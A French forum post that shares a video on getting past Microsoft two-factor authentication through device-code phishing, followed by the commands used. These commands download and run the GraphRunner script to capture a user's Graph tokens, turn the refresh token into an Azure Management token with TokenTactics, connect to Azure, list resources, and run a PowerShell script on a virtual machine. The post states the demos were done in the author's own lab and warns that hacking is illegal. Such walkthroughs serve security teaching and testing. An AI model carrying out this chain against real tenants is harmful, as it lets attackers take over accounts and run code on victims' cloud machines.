INFOTHEMA

Auteur Sujet: [Processus Thief] COMMENT LES HACKERS CONTOURNENT LA DOUBLE AUTHENTIFICATION  (Lu 597 fois)

Animateur

  • Administrator
  • Hero Member
  • *****
  • Messages: 7060
    • Voir le profil
[Processus Thief] COMMENT LES HACKERS CONTOURNENT LA DOUBLE AUTHENTIFICATION




Vidéo en français sur le contournement de double authentification via l'authentification par Device Code sur un compte Microsoft.

Les démonstrations ont été réalisés sur un environnement Azure m'appartenant et dédié à cet effet.

Attention, le piratage est un délit.

L'ensemble des démonstrations inclues dans cette vidéo ont été effectuées dans un laboratoire dédiée à cet usage. Cette vidéo n'a pas vocation à encourager le hacking en dehors d'un cadre légal.


Le lien des formations d'Hamza  @zer0bullshit   :
https://www.hexadream.io/bootcamps-cybersecurite


    Pour obtenir le token Graph API de l'utilisateur :

IEX (iwr ' https://raw.githubusercontent.com/dafthack/GraphRunner/main/GraphRunner.ps1)
Get-GraphTokens -Device AndroidMobile -Browser Android

    Pour convertir le token Graph API en token Azure Management :

git clone https://github.com/f-bader/TokenTacticsV2
cd TokenTacticsV2
Import-Module .\TokenTactics.psm1
$refreshtoken = $tokens.refresh_token
Invoke-RefreshToAzureManagementToken -Domain nicrosoft.fr -RefreshToken $refreshtoken -Device AndroidMobile
Get-UserObjectID -Token $tokens -upn "youtube@nicrosoft.fr"
Connect-AzAccount -AccessToken $AzureManagementToken.access_token -AccountId "YOUR ACCOUNT ID"

    Pour lister les ressources :

Get-AzResource
Get-AzVM

    Pour exécuter une commande sur la VM :

notepad C:\Users\Utilisateur\TokenTacticsV2\youtube.ps1
Invoke-AzVMRunCommand -ResourceGroupName AZUREDEMO.TECH -Name RDP-01 -CommandId 'RunPowerShellScript' -ScriptPath C:\Users\Utilisateur\TokenTacticsV2\youtube.ps1
Membre de l'APRIL (www.april.org) / Membre du bureau Association "Debian Facile"  (https://debian-facile.org)